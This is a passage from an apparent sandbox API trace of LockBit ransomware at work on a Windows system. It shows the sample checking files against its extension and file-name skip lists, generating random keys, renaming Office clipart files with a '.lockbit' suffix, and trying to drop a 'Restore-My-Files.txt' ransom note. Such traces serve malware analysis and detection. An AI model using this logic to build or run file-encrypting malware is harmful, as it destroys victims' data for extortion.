Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0148.264] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF") returned=".WMF" [0148.264] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0148.264] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0148.264] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0148.265] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0148.265] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF.lockbit") returned 72 [0148.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187837.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0148.270] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0148.270] malloc (_Size=0x40068) returned 0x3df0008 [0148.270] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=16354) returned 1 [0148.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.271] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0148.271] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0148.271] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0148.272] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0148.272] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.094] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.094] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.094] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.096] free (_Block=0x1fa2ed8) [0149.096] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187837.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.097] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.097] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.097] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x14fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187839.WMF", cAlternateFileName="")) returned 1 [0149.097] lstrcmpiW (lpString1=".", lpString2="J0187839.WMF") returned -1 [0149.097] lstrcmpiW (lpString1="..", lpString2="J0187839.WMF") returned -1 [0149.097] PathFindExtensionW (pszPath="J0187839.WMF") returned=".WMF" [0149.097] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.097] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.098] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.098] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187839.WMF") returned 1 [0149.099] lstrcmpiW (lpString1="ntldr", lpString2="J0187839.WMF") returned 1 [0149.099] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187839.WMF") returned 1 [0149.099] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187839.WMF") returned -1 [0149.099] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187839.WMF") returned -1 [0149.099] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187839.WMF") returned 1 [0149.099] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187839.WMF") returned -1 [0149.099] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.099] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF") returned=".WMF" [0149.099] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.099] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.100] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.100] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.101] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.101] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.101] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.101] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF.lockbit") returned 72 [0149.101] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187839.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0149.102] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.102] malloc (_Size=0x40068) returned 0x3df0008 [0149.102] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5372) returned 1 [0149.102] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0149.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0149.103] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.207] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.208] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.208] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0149.209] free (_Block=0x1fa2ed8) [0149.209] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187839.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.209] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.209] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.209] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x564eabb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1bcc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187847.WMF", cAlternateFileName="")) returned 1 [0149.209] lstrcmpiW (lpString1=".", lpString2="J0187847.WMF") returned -1 [0149.209] lstrcmpiW (lpString1="..", lpString2="J0187847.WMF") returned -1 [0149.209] PathFindExtensionW (pszPath="J0187847.WMF") returned=".WMF" [0149.209] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0149.209] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.210] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0149.211] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0149.211] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0187847.WMF") returned 1 [0149.212] lstrcmpiW (lpString1="ntldr", lpString2="J0187847.WMF") returned 1 [0149.212] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0187847.WMF") returned 1 [0149.212] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0187847.WMF") returned -1 [0149.212] lstrcmpiW (lpString1="autorun.inf", lpString2="J0187847.WMF") returned -1 [0149.212] lstrcmpiW (lpString1="thumbs.db", lpString2="J0187847.WMF") returned 1 [0149.212] lstrcmpiW (lpString1="iconcache.db", lpString2="J0187847.WMF") returned -1 [0149.212] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0149.212] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF") returned=".WMF" [0149.212] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0149.212] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0149.212] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0149.213] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0149.214] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0149.214] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF.lockbit") returned 72 [0149.214] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0187847.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0149.215] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0149.215] malloc (_Size=0x40068) returned 0x3df0008 [0149.215] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=7116) returned 1 [0149.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0149.216] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0149.216] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0149.218] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0149.218] malloc (_Size=0xa6) returned 0x1fa2ed8 [0149.218] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0149.219] free (_Block=0x1fa2ed8) [0149.220] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0187847.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0149.220] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0149.220] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0149.220] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7633f300, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65fe5b50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7633f300, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1d94, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0187849.WMF", cAlternateFileName="")) returned 1 [0149.220] lstrcmpiW (lpString1=".", lpString2="J0187849.WMF") returned -1 [0149.220] lstrcmpiW (lpString1="..", lpString2="J0187849.WMF") returned -1 [0149.220] PathFindExtensionW (pszPath="J0187849.WMF") returned=".WMF" [0149.220] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0149.220] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned 